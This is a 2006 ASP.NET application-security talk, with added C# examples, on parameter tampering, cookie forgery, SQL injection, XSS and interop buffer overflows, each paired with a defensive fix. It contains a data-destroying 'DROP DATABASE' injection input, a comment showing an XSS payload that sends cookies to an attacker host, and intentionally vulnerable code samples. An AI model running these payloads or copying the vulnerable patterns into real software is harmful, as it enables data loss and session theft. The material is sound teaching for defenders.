An Introduction to Application Security In ASP.NET Environments

Houston .NET User Group

February 23rd, 2006



Overview

• Background
• What is Application Security and Why Is It Important?
• Examples
• ASP.NET Specific Examples
• What is New in .NET 2.0?
• Resources and Conclusions


Background

• Denim Group
  – Texas-based consultancy
  – Microsoft Gold Certified Partner
  – Custom software development
  – Systems integration
  – Application security

• Management Team Experience
  – Large-scale software development
  – Air Force information warfare
  – Client service for DoD, Big 4, Fortune 500

• Myself: Dan Cornell
  – Microsoft Certified Solution Developer
  – Java 2 Certified Programmer


What is Application Security and Why is it Important?

• Application Security Defined
• Fit with General Information Security Landscape
• Why Does Application Security Matter?


Application Security Defined

• Ensuring that custom application code performs as expected under the entire range of possible inputs

• Goals:
  – Confidentiality
  – Integrity
  – Availability

• Relationship to Software Quality Assurance
  – Really a sub-area of SQA
  – SQA typically verifies that software does what it is supposed to do
  – Application security is concerned with verifying that software does not do what it should not do


Software Implementation – Perfect World

(Diagram labels: Intended Functionality, Actual Functionality. In the perfect world the two coincide exactly.)


Software Implementation – Real World

(Diagram labels: Intended Functionality, Actual Functionality, Built Features, Bugs, Unintended and Undocumented Functionality. In the real world the two only partly overlap: the overlap is the built features, and the rest of what was actually built is bugs plus unintended, undocumented functionality.)


Information Security

• Software Development: “Build” Culture
  – Features, functions and timelines

• Information Security: “Measure” Culture
  – Audit, assess and maintain

• Application security applies information security principles to custom software development efforts

• Many traditional information security practitioners are ill-equipped to mitigate application security issues


Why Does This Matter?

• Business-critical web applications are Internet-facing
  – An increasing number of assets are exposed

• Most applications have serious flaws
  – Foundstone (McAfee) and @stake (Symantec) studies

• The regulatory environment has changed
  – Sarbanes-Oxley
  – GLB (Gramm-Leach-Bliley)
  – California SB-1386


OWASP Top 10 Critical Web Application Security Vulnerabilities (2004 edition)

• Unvalidated Input
• Broken Access Control
• Broken Authentication and Session Management
• Cross Site Scripting (XSS)
• Buffer Overflows
• Injection Flaws
• Improper Error Handling
• Insecure Storage
• Denial of Service
• Insecure Configuration Management

http://www.owasp.org/documentation/topten.html


Examples

• Hidden parameter tampering
• Cookie manipulation
• SQL injection


Hidden Parameter Tampering

• Price information is stored in a hidden HTML form field
• Assumption: the hidden field won’t be edited
• Attacker edits the price parameter (the field is hidden only in the rendered page; it is plain text in the HTML source and in the POST body)
• Attacker submits the altered web page with the new “price”
• Application trusts the price parameter from the user
• Still widespread in many web stores
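A worked version of the pattern above, added here as an example and not taken from the slides: the unsafe handler computes the total from the submitted "price" field, the fixed handler accepts only a product id and a quantity and looks the price up on the server. The catalog, SKUs, prices and form field names are constructed for illustration; the NameValueCollection stands in for Request.Form.

```csharp
// Added example (not from the original slides). Simulates the two ways the
// checkout could compute a total from a submitted form: trusting the hidden
// "price" field, or looking the price up on the server. Catalog, SKUs,
// prices and field names are constructed for illustration.
using System;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.Globalization;

public static class PriceHandling
{
    // Constructed in-memory catalog standing in for the product database.
    private static readonly Dictionary<string, decimal> Catalog = BuildCatalog();

    private static Dictionary<string, decimal> BuildCatalog()
    {
        Dictionary<string, decimal> c = new Dictionary<string, decimal>();
        c["SKU-1001"] = 499.00m;
        c["SKU-1002"] = 29.95m;
        return c;
    }

    // VULNERABLE: the price is whatever the browser sent. Editing the hidden
    // field in the page, or POSTing price=1.00 directly, changes the total.
    public static decimal TotalTrustingHiddenField(NameValueCollection form)
    {
        int qty = int.Parse(form["qty"], CultureInfo.InvariantCulture);
        decimal price = decimal.Parse(form["price"], CultureInfo.InvariantCulture); // attacker-controlled
        return price * qty;
    }

    // FIXED: accept only an identifier and a quantity from the client. The
    // price comes from server-side data; the quantity is range-checked so a
    // negative or enormous value is rejected rather than priced.
    public static decimal TotalFromCatalog(NameValueCollection form)
    {
        string sku = form["sku"];
        decimal price;
        if (sku == null || !Catalog.TryGetValue(sku, out price))
            throw new ArgumentException("Unknown product");

        int qty;
        if (!int.TryParse(form["qty"], NumberStyles.Integer, CultureInfo.InvariantCulture, out qty)
            || qty < 1 || qty > 100)
            throw new ArgumentException("Invalid quantity");

        return price * qty;
    }

    public static void Main()
    {
        // Constructed POST body: the attacker rewrote price=499.00 to 1.00.
        NameValueCollection tampered = new NameValueCollection();
        tampered["sku"] = "SKU-1001";
        tampered["qty"] = "2";
        tampered["price"] = "1.00";

        Console.WriteLine("Trusting the hidden field: " + TotalTrustingHiddenField(tampered));
        Console.WriteLine("Server-side lookup:        " + TotalFromCatalog(tampered));
    }
}
```

Compile with csc and run: the first function returns the attacker's total, the second the catalog total for the same request. Note that a plain hidden input (or the HiddenField control's posted value) is not ViewState; ViewState is MAC-protected by default, a hidden form field is not, so anything round-tripped that way has to be re-derived or re-checked on the server.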


The Attack


The Result


Cookie Manipulation

• Browser cookie is used to store user identity information
• Assumption: cookies are set by server-side code, handled by the browser automatically and not manipulated by users
• Attacker alters the cookie
• Application trusts the browser cookie and allows the attacker to assume the identity of another user


The Attack


The Attack


The Result


SQL Injection

• SQL statements are created from a combination of static text and user inputs
• Assumption: users will enter well-formed inputs
• Attacker crafts a custom input to hijack control of the SQL interpreter and execute arbitrary SQL statements
• Very common flaw with tremendous security implications


The Attack

// using System.Data; using System.Data.SqlClient;
string username = Request["username"];
string password = Request["password"];
// Vulnerable: the query text is built by concatenating raw user input.
string sql = "SELECT * FROM [User] WHERE username = '" + username +
             "' AND password = '" + password + "'";
SqlConnection conn = new SqlConnection(connectionString); // connectionString assumed to be defined
conn.Open();
SqlCommand cmd = new SqlCommand(sql, conn);
IDataReader reader = cmd.ExecuteReader();


The Attack

• Specially crafted input contains SQL control characters


The Attack

• Malicious user sends in a username parameter of:

    Dcornell'; DROP DATABASE Ecommerce; --

  SQL executed is:

    SELECT * FROM User WHERE username = 'Dcornell'; DROP DATABASE Ecommerce; -- AND password = 'whocares'

  Everything after the -- is a comment, so the password check never runs.

• Attacker can execute arbitrary database queries with the same permissions as the application
  – View sensitive data
  – Modify data
  – Destroy data


ASP.NET Specific Examples

• Access Control
  – Authentication
  – Authorization

• Input Validation
  – ASP.NET validation
  – SQL injection
  – Cross Site Scripting (XSS)
  – Buffer Overflows


Access Control

• Authentication
  – HTTP Basic
  – Windows
  – Forms

• Available in ASP.NET 1.1
• Much improved in ASP.NET 2.0 – lots of ready-made controls (Login, LoginStatus, CreateUserWizard) on top of the Membership and Role providers
• See: http://www.sitepoint.com/article/asp-net-2-security

• Authorization
  – Control access to pages:
    • NTFS ACLs: FileAuthorizationModule (checks the requested file's ACL against the Windows identity, so it only applies with Windows authentication)
    • web.config <authorization> element: UrlAuthorizationModule
    • See: http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpguide/html/cpconaspnetauthorization.asp
  – Imperative security: Page.User.IsInRole("roleName")
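Added example, not from the slides, that covers both the earlier "Cookie Manipulation" example and the authorization mechanisms listed here: identity read from a plaintext cookie beside a Forms Authentication ticket, the Global.asax hook that turns a validated ticket into a principal, and an imperative IsInRole check. The cookie name "user" and the role "OrderApprover" are constructed. The matching declarative rule is an `<allow roles="OrderApprover"/>` plus `<deny users="*"/>` pair inside `<authorization>` in web.config, which UrlAuthorizationModule evaluates against the same principal.

```csharp
// Added example (not from the original slides). Identity from a plaintext
// cookie beside a Forms Authentication ticket, the Global.asax hook that
// turns a validated ticket into a principal, and an imperative role check.
// The cookie name "user" and the role "OrderApprover" are constructed.
using System;
using System.Security.Principal;
using System.Web;
using System.Web.Security;

public static class IdentityHandling
{
    // VULNERABLE: identity is read straight out of a cookie the browser sent.
    // Changing "user=alice" to "user=admin" is enough to become admin.
    public static string UserFromPlainCookie(HttpRequest request)
    {
        HttpCookie c = request.Cookies["user"];
        return c == null ? null : c.Value;
    }

    // FIXED (at login, after the password has been verified): issue a Forms
    // Authentication ticket. ASP.NET encrypts and MAC-protects it with the
    // machineKey, so an edited cookie fails validation instead of being
    // believed. Roles ride in UserData and are covered by the same MAC.
    public static void IssueTicket(HttpResponse response, string userName, string[] roles)
    {
        FormsAuthenticationTicket ticket = new FormsAuthenticationTicket(
            1, userName, DateTime.Now, DateTime.Now.AddMinutes(20),
            false, string.Join(",", roles));

        HttpCookie cookie = new HttpCookie(FormsAuthentication.FormsCookieName,
                                           FormsAuthentication.Encrypt(ticket));
        cookie.HttpOnly = true;   // not readable from script
        cookie.Secure = true;     // only sent over HTTPS (assumes the site uses it)
        response.Cookies.Add(cookie);
    }

    // Global.asax Application_AuthenticateRequest: rebuild the principal from
    // the validated ticket so Page.User.IsInRole() and UrlAuthorizationModule
    // see the roles. Anything that fails to decrypt is treated as anonymous.
    public static void AttachPrincipal(HttpContext context)
    {
        HttpCookie cookie = context.Request.Cookies[FormsAuthentication.FormsCookieName];
        if (cookie == null || cookie.Value.Length == 0) return;

        FormsAuthenticationTicket ticket;
        try { ticket = FormsAuthentication.Decrypt(cookie.Value); }
        catch (Exception) { return; }   // Decrypt throws or returns null on a tampered ticket
        if (ticket == null || ticket.Expired) return;

        string[] roles = ticket.UserData.Length == 0 ? new string[0] : ticket.UserData.Split(',');
        context.User = new GenericPrincipal(new FormsIdentity(ticket), roles);
    }

    // Imperative check in a page or handler: the role comes from the
    // validated principal, never from a value the client supplied directly.
    public static bool CanApproveOrders(IPrincipal user)
    {
        return user != null
            && user.Identity.IsAuthenticated
            && user.IsInRole("OrderApprover");
    }
}
```

Requires `<authentication mode="Forms"/>` in web.config and a machineKey that is either auto-generated (single server) or shared explicitly across a web farm. In ASP.NET 2.0 the same principal-building step is done for you by enabling `<roleManager enabled="true"/>`; the hand-written version is shown so the trust boundary is visible.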


Input Validation

• ASP.NET Validation
• SQL Injection
• Cross Site Scripting (XSS)
• Buffer Overflows


ASP.NET Validation

• Perform both client-side and server-side validation
  – Client-side validation is a convenience for the user; anyone who disables JavaScript or posts the form directly skips it, so the server must check Page.IsValid before using the input
• RequiredFieldValidator requires that a field be present
  – Other validators pass through blank inputs, so often you must use two validators on the same field
• Other examples of Validators include:
  – CompareValidator
  – RangeValidator
  – RegularExpressionValidator
  – CustomValidator
• Validators display error messages in-place
• ValidationSummary object used to display a summary of all errors from validators on a page
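Added example, not from the slides: the two-validator pattern (RequiredFieldValidator plus RegularExpressionValidator on one field) built in a code-behind so the whole thing is C#, together with the server-side Page.IsValid check. It assumes an .aspx page whose markup contains `<form id="form1" runat="server">`; the control ids and the quantity format are constructed.

```csharp
// Added example (not from the original slides). A quantity field with a
// presence validator and a whitelist regex validator, and the server-side
// Page.IsValid check that makes bypassing the client-side script pointless.
// Assumes the .aspx declares <form id="form1" runat="server">; control ids
// and the allowed quantity range are constructed.
using System;
using System.Web.UI;
using System.Web.UI.WebControls;

public partial class OrderForm : Page
{
    private TextBox quantity;
    private Button submit;
    private Label result;

    protected override void OnInit(EventArgs e)
    {
        base.OnInit(e);

        quantity = new TextBox();
        quantity.ID = "Quantity";

        // 1) Presence: without this, an empty box passes every other validator.
        RequiredFieldValidator required = new RequiredFieldValidator();
        required.ControlToValidate = "Quantity";
        required.ErrorMessage = "Quantity is required.";
        required.Display = ValidatorDisplay.Dynamic;

        // 2) Format: a whitelist of what a quantity may look like (1..999).
        RegularExpressionValidator format = new RegularExpressionValidator();
        format.ControlToValidate = "Quantity";
        format.ValidationExpression = @"^[1-9][0-9]{0,2}$";
        format.ErrorMessage = "Quantity must be a whole number between 1 and 999.";
        format.Display = ValidatorDisplay.Dynamic;

        submit = new Button();
        submit.Text = "Order";
        submit.Click += new EventHandler(Submit_Click);   // CausesValidation is true by default

        result = new Label();
        ValidationSummary summary = new ValidationSummary();

        form1.Controls.Add(quantity);
        form1.Controls.Add(required);
        form1.Controls.Add(format);
        form1.Controls.Add(submit);
        form1.Controls.Add(summary);
        form1.Controls.Add(result);
    }

    private void Submit_Click(object sender, EventArgs e)
    {
        // The button re-runs every validator on the server before raising
        // Click; Page.IsValid is the result. A crafted POST that skipped the
        // browser-side script is caught here.
        if (!Page.IsValid)
            return;

        int qty = int.Parse(quantity.Text);   // safe: the regex guarantees 1..999
        result.Text = "Ordered " + qty + " units.";   // no user text reaches the page
    }
}
```

Because the controls are created in OnInit they exist on every request, which is what lets the validators re-run on postback. The same two validators declared in .aspx markup behave identically; the point is the `Page.IsValid` guard, which is easy to forget when the in-browser check already looks like it is doing the job.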


SQL Injection

• As seen before, this is the result of creating SQL queries by combining static text and unfiltered user inputs

• To prevent attacks, keep user input out of the query text entirely:
  – Parameterized queries (SqlParameter): the SQL is fixed and the values are bound separately
  – Stored procedures (CommandType.StoredProcedure), called with parameters; this only helps if the procedure itself does not build dynamic SQL from its arguments
  – Where dynamic SQL is unavoidable, be sure to actually escape potentially hostile data, and treat escaping as the last resort rather than the primary defence
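Added example, not from the slides: the login query from the attack slides rewritten so that user input never becomes SQL text, first as a parameterized inline query and then as a parameterized stored procedure call. Table and column names follow the slides; the connection string argument and the procedure name dbo.usp_CheckLogin are assumptions, and the procedure body is assumed to run a plain parameterized SELECT rather than EXEC on a concatenated string.

```csharp
// Added example (not from the original slides). The login check with the
// SQL fixed at compile time and the user-supplied values bound as parameters.
// Connection string and the procedure name dbo.usp_CheckLogin are assumed.
using System;
using System.Data;
using System.Data.SqlClient;

public static class LoginQueries
{
    // Parameterized query: a username of "Dcornell'; DROP DATABASE Ecommerce; --"
    // is compared literally against the column; it never reaches the parser
    // as SQL, so the quote and the comment marker have no special meaning.
    public static bool UserExists(string connectionString, string username, string password)
    {
        const string sql =
            "SELECT COUNT(*) FROM [User] WHERE username = @username AND password = @password";

        using (SqlConnection conn = new SqlConnection(connectionString))
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            // Typed, length-bounded parameters also cap the input size.
            cmd.Parameters.Add("@username", SqlDbType.NVarChar, 64).Value = username;
            cmd.Parameters.Add("@password", SqlDbType.NVarChar, 128).Value = password;
            conn.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // Stored procedure: safe because the parameters are bound here AND the
    // procedure body (assumed) does not assemble dynamic SQL from them.
    public static bool UserExistsViaProc(string connectionString, string username, string password)
    {
        using (SqlConnection conn = new SqlConnection(connectionString))
        using (SqlCommand cmd = new SqlCommand("dbo.usp_CheckLogin", conn))
        {
            cmd.CommandType = CommandType.StoredProcedure;
            cmd.Parameters.Add("@username", SqlDbType.NVarChar, 64).Value = username;
            cmd.Parameters.Add("@password", SqlDbType.NVarChar, 128).Value = password;
            conn.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}
```

Both methods keep the slides' plaintext password column so the comparison with the vulnerable version is direct; in a real application the column holds a salted hash and the comparison happens in code, which also keeps the secret out of the SQL text altogether.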


Cross Site Scripting (XSS)

• The ASP.NET framework provides pretty good protection against some XSS attacks
  – Request validation (ValidateRequest, on by default in ASP.NET 1.1 and 2.0) rejects input that looks like markup
  – This is an example of blacklisting inputs rather than whitelisting inputs; it can be switched off per page or per application and does not catch every encoding

• Underlying problem is a failure to properly escape special HTML characters on output

• Most ASP.NET controls provide this
  – Literal and Label do not: both write their Text property to the page verbatim
  – In ASP.NET 2.0, set the Literal's Mode property to Encode
  – Or use the HttpServerUtility.HtmlEncode method (Server.HtmlEncode) before assigning the text

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpref/html/frlrfSystemWebHttpServerUtilityClassHtmlEncodeTopic1.asp
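Added example, not from the slides: a search page that echoes a query-string parameter, showing the unencoded string beside HttpUtility.HtmlEncode and beside the ASP.NET 2.0 Literal Mode=Encode. It assumes the .aspx declares two Literal controls named echo and encodedEcho; the parameter name q and the sample payload are constructed.

```csharp
// Added example (not from the original slides). Echoing a query-string
// parameter without encoding, with HttpUtility.HtmlEncode, and with the
// ASP.NET 2.0 Literal Mode=Encode. Assumes the .aspx declares two Literal
// controls, "echo" and "encodedEcho"; the parameter name "q" is constructed.
using System;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;

public partial class Search : Page
{
    // VULNERABLE: Literal (default mode) and Label both write Text verbatim,
    // so q=<script>document.location='http://evil/?'+document.cookie</script>
    // (with request validation off, or a variant that slips past it) is
    // emitted as markup and runs in every visitor's browser.
    public static string UnsafeMessage(string q)
    {
        return "You searched for: " + q;
    }

    // FIXED: encode on output. HtmlEncode turns <, >, & and the double quote
    // into entities, which is the correct escaping for text between tags.
    public static string SafeMessage(string q)
    {
        return "You searched for: " + HttpUtility.HtmlEncode(q);
    }

    // Inside a quoted attribute value use attribute encoding. Inside a
    // <script> block or a URL, HTML encoding is the wrong escaping entirely
    // and untrusted data should not be placed there.
    public static string SafeAttribute(string q)
    {
        return HttpUtility.HtmlAttributeEncode(q);
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        string q = Request.QueryString["q"] ?? "";

        echo.Text = SafeMessage(q);            // encoded by hand

        encodedEcho.Mode = LiteralMode.Encode; // encoded by the control (ASP.NET 2.0)
        encodedEcho.Text = "You searched for: " + q;
    }
}
```

The two static helpers take a string and return a string, so the difference can be checked from a console program that references System.Web.dll without hosting the page: pass the payload in the comment to each and compare what comes back.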


Buffer Overflows

• Managed code should typically be fine
  – The CLR bounds-checks array and string access, so pure managed code does not overflow buffers in the classic sense
  – This can give a false sense of security: unsafe blocks, P/Invoke and COM interop step outside those checks

• Legacy COM components
  – Can still contain buffer overflows
  – “Seamless” .NET/COM integration makes these sneaky
  – Wrap potentially dangerous calls: validate lengths and buffer sizes on the managed side before they cross into native code
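Added example, not from the slides: the interop-boundary pattern that actually produces an overflow in a managed application, shown with a P/Invoke call rather than a COM component (it is the same marshalling boundary). GetWindowsDirectory is a real kernel32 export that takes a buffer and the caller's statement of its size; the unchecked wrapper, the checked wrapper and its retry logic are this example's own.

```csharp
// Added example (not from the original slides). A native call that takes a
// caller-supplied buffer and its length: if the managed side states a size
// larger than the buffer it really passed, native code writes past the end.
// GetWindowsDirectory is a real kernel32 export; the wrappers are the
// example's own.
using System;
using System.ComponentModel;
using System.Runtime.InteropServices;
using System.Text;

public static class NativeWrapper
{
    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    private static extern uint GetWindowsDirectory(StringBuilder lpBuffer, uint uSize);

    // DANGEROUS shape: the size argument is whatever the caller claims. The
    // marshaler allocates a native buffer of buffer.Capacity characters; a
    // claimedSize larger than that lets the callee overrun it.
    public static string WindowsDirectoryUnchecked(StringBuilder buffer, uint claimedSize)
    {
        GetWindowsDirectory(buffer, claimedSize);
        return buffer.ToString();
    }

    // WRAPPED: the wrapper owns the buffer, always passes the buffer's true
    // capacity, checks the return value, and handles "too small" by growing
    // the buffer to the size the callee reported and retrying once.
    public static string WindowsDirectory()
    {
        StringBuilder buffer = new StringBuilder(260);   // MAX_PATH
        for (int attempt = 0; attempt < 2; attempt++)
        {
            uint needed = GetWindowsDirectory(buffer, (uint)buffer.Capacity);
            if (needed == 0)
                throw new Win32Exception(Marshal.GetLastWin32Error());
            if (needed < buffer.Capacity)
                return buffer.ToString();          // success: chars copied, NUL fitted
            buffer.Capacity = (int)needed + 1;     // too small: required size was returned
        }
        throw new InvalidOperationException("Native call kept reporting a larger buffer");
    }

    public static void Main()
    {
        Console.WriteLine(WindowsDirectory());
    }
}
```

The same discipline applies to a COM method that takes a BSTR or SAFEARRAY plus a length: the managed wrapper, not the caller, should be the one that computes the length from the object it actually passes, and it should reject inputs longer than the component documents as its maximum.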


What is New in .NET 2.0?

• Reference connection strings contained in machine.config (or web.config) through the new <connectionStrings> section and ConfigurationManager.ConnectionStrings
• Encrypt sections of .config files with a machine-bound key (protected configuration: the DPAPI or RSA provider, via aspnet_regiis -pe or the configuration API)
• Easier access to DPAPI functions from .NET (System.Security.Cryptography.ProtectedData)
• Forms Authentication improvements (mentioned earlier)
• SecureString class
• More…
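Added example, not from the slides: three of the listed .NET 2.0 features in code, reading a named connection string, protecting the connectionStrings section with the DPAPI provider from the configuration API, and using ProtectedData and SecureString directly. The connection-string name Ecommerce and the virtual path passed to the protect routine are assumptions.

```csharp
// Added example (not from the original slides). Named connection strings,
// protected configuration with the DPAPI provider, and direct use of
// ProtectedData and SecureString. The name "Ecommerce" and the virtual
// path argument are assumptions.
using System;
using System.Configuration;
using System.Security;
using System.Security.Cryptography;
using System.Text;
using System.Web.Configuration;

public static class ConfigProtection
{
    // Read a connection string by name from <connectionStrings>. This works
    // identically whether or not the section is encrypted on disk: the
    // runtime decrypts transparently, so application code never changes.
    public static string EcommerceConnectionString()
    {
        ConnectionStringSettings s = ConfigurationManager.ConnectionStrings["Ecommerce"];
        if (s == null)
            throw new ConfigurationErrorsException("Missing connection string 'Ecommerce'");
        return s.ConnectionString;
    }

    // Encrypt the connectionStrings section of a web.config in place using
    // DPAPI (machine store). Equivalent to:
    //   aspnet_regiis -pe "connectionStrings" -app "/MyApp"
    // Run it on the server that will read the file, under an account that may
    // write web.config; the DPAPI machine key never leaves that box, so the
    // encrypted file is useless on any other machine.
    public static void ProtectConnectionStrings(string virtualPath)
    {
        Configuration config = WebConfigurationManager.OpenWebConfiguration(virtualPath);
        ConfigurationSection section = config.GetSection("connectionStrings");
        if (!section.SectionInformation.IsProtected)
        {
            section.SectionInformation.ProtectSection("DataProtectionConfigurationProvider");
            config.Save();
        }
    }

    // DPAPI directly: no key management in the application. LocalMachine
    // scope means any process on this machine can decrypt; use CurrentUser
    // to bind the blob to the application pool identity instead.
    public static byte[] ProtectForMachine(string secret)
    {
        byte[] plain = Encoding.UTF8.GetBytes(secret);
        return ProtectedData.Protect(plain, null, DataProtectionScope.LocalMachine);
    }

    public static string UnprotectForMachine(byte[] blob)
    {
        byte[] plain = ProtectedData.Unprotect(blob, null, DataProtectionScope.LocalMachine);
        return Encoding.UTF8.GetString(plain);
    }

    // SecureString keeps the value encrypted in memory and lets it be scrubbed
    // on Dispose instead of lingering in the managed heap until a GC happens.
    public static SecureString ToSecureString(string value)
    {
        SecureString s = new SecureString();
        foreach (char c in value)
            s.AppendChar(c);
        s.MakeReadOnly();
        return s;
    }
}
```

References System.Configuration.dll, System.Security.dll and System.Web.dll. The RSA provider ("RsaProtectedConfigurationProvider") is the choice for a web farm, because its key container can be exported and imported on every node, whereas a DPAPI-protected web.config must be re-encrypted on each server.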


Resources

• OWASP www.owasp.org
  – Top 10
  – Guide
  – WebGoat training tool
  – WebScarab penetration testing tool (proxy)
  – Discussion lists

• MSDN msdn.microsoft.com/security


Questions

Dan Cornell
[email protected]

Denim Group, Ltd.
www.denimgroup.com